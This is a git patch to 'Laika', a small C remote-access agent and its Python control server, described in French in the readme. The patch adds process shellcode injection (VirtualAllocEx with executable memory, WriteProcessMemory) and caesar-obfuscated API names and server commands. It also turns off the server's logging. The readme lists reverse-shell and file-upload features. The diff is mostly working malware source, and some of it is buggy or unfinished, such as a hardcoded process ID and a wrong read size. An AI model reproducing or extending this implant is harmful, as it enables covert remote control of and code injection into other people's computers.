From d1ea71557ddc3702e6073e6b12edc524a0e47411 Mon Sep 17 00:00:00 2001 From: ALittlePatate Date: Thu, 16 Mar 2023 08:44:10 +0100 Subject: [PATCH] =?UTF-8?q?d=C3=A9but=20de=20shellcode=20injection,=20read?= =?UTF-8?q?me=20update?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- Laika/main.c | 86 ++++++++++++++++++++++++++------------------ Laika/resolve_apis.c | 3 ++ Laika/resolve_apis.h | 6 ++++ Laika/shellcode.c | 2 +- Server/Server.py | 9 ++--- readme.md | 6 ++-- 6 files changed, 69 insertions(+), 43 deletions(-) diff --git a/Laika/main.c b/Laika/main.c index 7cea49c..fbe1fb7 100644 --- a/Laika/main.c +++ b/Laika/main.c @@ -287,9 +287,9 @@ retry: } if (Api.strncmp(server_reply, "nsojhy", strlen("nsojhy")) == 0) { //inject - char* arch = (char*)Api.malloc(3); + char* arch = (char*)Api.malloc(2); - if (Api.recv(sock, arch, 3, 0) <= 0) { + if (Api.recv(sock, arch, 2, 0) <= 0) { //send failed Api.free(arch); Sleep_(Sleep_TIME); @@ -297,57 +297,75 @@ retry: } CAESAR_DECRYPT(arch); - // Create a file handle for the memory buffer - HANDLE hFile = Api.CreateFileW( - L"ykifyk", - GENERIC_READ | GENERIC_WRITE, - FILE_SHARE_READ | FILE_SHARE_WRITE, - NULL, - CREATE_ALWAYS, - FILE_ATTRIBUTE_NORMAL, - NULL); + HANDLE hFile = CreateFileMappingW( + INVALID_HANDLE_VALUE, // Use the page file + NULL, // Default security attributes + PAGE_READWRITE, // Read/write access + 0, // Map the entire file + BUFFER_SIZE, // Size of the file (in bytes) + TEXT("idufhiu")); // Name of the file mapping object - upload_file(sock, hFile); - - // Open the file handle for reading - hFile = Api.CreateFileW( - L"ykifyk", - GENERIC_READ, - FILE_SHARE_READ | FILE_SHARE_WRITE, - NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL); - - if (hFile == INVALID_HANDLE_VALUE) { + if (hFile == NULL) { + Api.free(arch); Sleep_(Sleep_TIME); goto retry; } - char* buffer = (char*)Api.malloc(BUFFER_SIZE); - Api.ReadFile(hFile, buffer, BUFFER_SIZE, NULL, NULL); - Api.CloseHandle(hFile); + upload_file(sock, hFile); + + // Move the file pointer back to the beginning of the file + Api.SetFilePointer(hFile, 0, NULL, FILE_BEGIN); HANDLE proc; - if (Api.strncmp(arch, "x86", strlen("x86")) == 0) { - proc = FindProcessByArch(L"x86"); + if (Api.strncmp(arch, "32", strlen("32")) == 0) { + proc = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, (DWORD)18872);//FindProcessByArch(L"x86"); } else { proc = FindProcessByArch(L"x64"); } + Api.free(arch); + if (proc == NULL) { - Api.free(arch); - Api.free(buffer); + Api.CloseHandle(hFile); Sleep_(Sleep_TIME); goto retry; } - //Api.WriteProcessMemory(proc, (LPVOID)0, "", 0, NULL); WIP + // Get the size of the file + LARGE_INTEGER fileSize; + if (!Api.GetFileSizeEx(hFile, &fileSize)) + { + Api.CloseHandle(hFile); + Api.CloseHandle(proc); + Sleep_(Sleep_TIME); + goto retry; + } + LPVOID addr = Api.VirtualAllocEx(proc, NULL, (size_t)fileSize.QuadPart, MEM_COMMIT, PAGE_EXECUTE_READWRITE); + if (addr == NULL) { + Api.CloseHandle(hFile); + Api.CloseHandle(proc); + Sleep_(Sleep_TIME); + goto retry; + } + + DWORD bytesRead; + char* shellcode = (char*)Api.malloc((size_t)fileSize.QuadPart); + if (!Api.ReadFile(hFile, shellcode, sizeof(shellcode), &bytesRead, NULL)) + { + Api.free(shellcode); + Api.CloseHandle(hFile); + Api.CloseHandle(proc); + Sleep_(Sleep_TIME); + goto retry; + } + + Api.WriteProcessMemory(proc, addr, shellcode, BUFFER_SIZE, NULL); + + Api.free(shellcode); + Api.CloseHandle(hFile); Api.CloseHandle(proc); - Api.free(arch); - Api.free(buffer); } if (Api.strncmp(server_reply, "ljydknqjdqnxy", strlen("ljydknqjdqnxy")) == 0) { //get_file_list diff --git a/Laika/resolve_apis.c b/Laika/resolve_apis.c index f0175c6..734032b 100644 --- a/Laika/resolve_apis.c +++ b/Laika/resolve_apis.c @@ -41,6 +41,9 @@ void InitApis() { Api.Process32NextW = (TProcess32NextW)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Uwthjxx87Sj}y\\")); Api.IsWow64Process = (TIsWow64Process)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("Nx\\t|;9Uwthjxx")); Api.WriteProcessMemory = (TWriteProcessMemory)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("\\wnyjUwthjxxRjrtw~")); + Api.VirtualAllocEx = (TVirtualAllocEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("[nwyzfqFqqthJ}")); + Api.SetFilePointer = (TSetFilePointer)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("XjyKnqjUtnsyjw")); + Api.GetFileSizeEx = (TGetFileSizeEx)Api.GetProcAddress(hKernel32, CAESAR_DECRYPT("LjyKnqjXn\x7fjJ}")); //GetFileSieEx hMsvcrt = LoadLibraryA(CAESAR_DECRYPT("rx{hwy3iqq")); if (!hMsvcrt) { diff --git a/Laika/resolve_apis.h b/Laika/resolve_apis.h index 53a97a1..c4e9180 100644 --- a/Laika/resolve_apis.h +++ b/Laika/resolve_apis.h @@ -69,6 +69,9 @@ typedef HANDLE(WINAPI* TOpenProcess)(DWORD, BOOL, DWORD); typedef BOOL(WINAPI* TProcess32NextW)(HANDLE, LPPROCESSENTRY32W); typedef BOOL(WINAPI* TIsWow64Process)(HANDLE, PBOOL); typedef BOOL(WINAPI* TWriteProcessMemory)(HANDLE, LPVOID, LPCVOID, SIZE_T, SIZE_T*); +typedef LPVOID(WINAPI* TVirtualAllocEx)(HANDLE, LPVOID, SIZE_T, DWORD, DWORD); +typedef DWORD(WINAPI* TSetFilePointer)(HANDLE, LONG, PLONG, DWORD); +typedef BOOL(WINAPI* TGetFileSizeEx)(HANDLE, PLARGE_INTEGER); typedef struct ApiList { Tconnect connect; @@ -115,6 +118,9 @@ typedef struct ApiList { TProcess32NextW Process32NextW; TIsWow64Process IsWow64Process; TWriteProcessMemory WriteProcessMemory; + TVirtualAllocEx VirtualAllocEx; + TSetFilePointer SetFilePointer; + TGetFileSizeEx GetFileSizeEx; Tmbstowcs mbstowcs; Twcstombs wcstombs; diff --git a/Laika/shellcode.c b/Laika/shellcode.c index 092cc6c..f661bfc 100644 --- a/Laika/shellcode.c +++ b/Laika/shellcode.c @@ -23,7 +23,7 @@ HANDLE FindProcessByArch(const wchar_t* arch) HANDLE hProcess; BOOL isWow64; - hProcess = Api.OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); + hProcess = Api.OpenProcess(PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID); if (hProcess == NULL) { continue; } diff --git a/Server/Server.py b/Server/Server.py index 0fee567..35f001a 100644 --- a/Server/Server.py +++ b/Server/Server.py @@ -145,8 +145,8 @@ def upload_file(fp, sock): app = Flask(__name__) # Disable Flask's default logging -#log = logging.getLogger('werkzeug') -#log.disabled = True +log = logging.getLogger('werkzeug') +log.disabled = True @app.route('/') def serve_file(filename): @@ -559,10 +559,7 @@ def main() -> None : continue client.send(CAESAR("inject").encode()) - if arch == "32" : - client.send(CAESAR("x86").encode()) - else : - client.send(CAESAR("x64").encode()) + client.send(CAESAR(arch).encode()) fp = open(fichier, "rb") upload_file(fp, client) diff --git a/readme.md b/readme.md index bec9877..1a63d0c 100644 --- a/readme.md +++ b/readme.md @@ -1,14 +1,16 @@ # Laika +J'ai commencé un début de Shellcode injection mais j'ai un peu la flemme de continuer. Pour bien faire il faudrait créer un process "zombie" qui va recevoir les shellcodes à injecter (agents/features), et un watcher qui le relance s'il meurt.
+L'agent N'EST PAS plug and play, il manque certaines choses, de plus c'est un projet perso et c'est pas vraiment fait pour être utilisé.
+ # Agent ## Features : * Reverse shell * File explorer (download/upload/remove) -* Shellcode injection (TODO) ## Caractéristiques -* Petit (12ko) +* Petit (14ko) * Fait en C, sans CRT * x32 bit * Modulaire (peut se déployer via shellcode/dll/pe injection/.exe)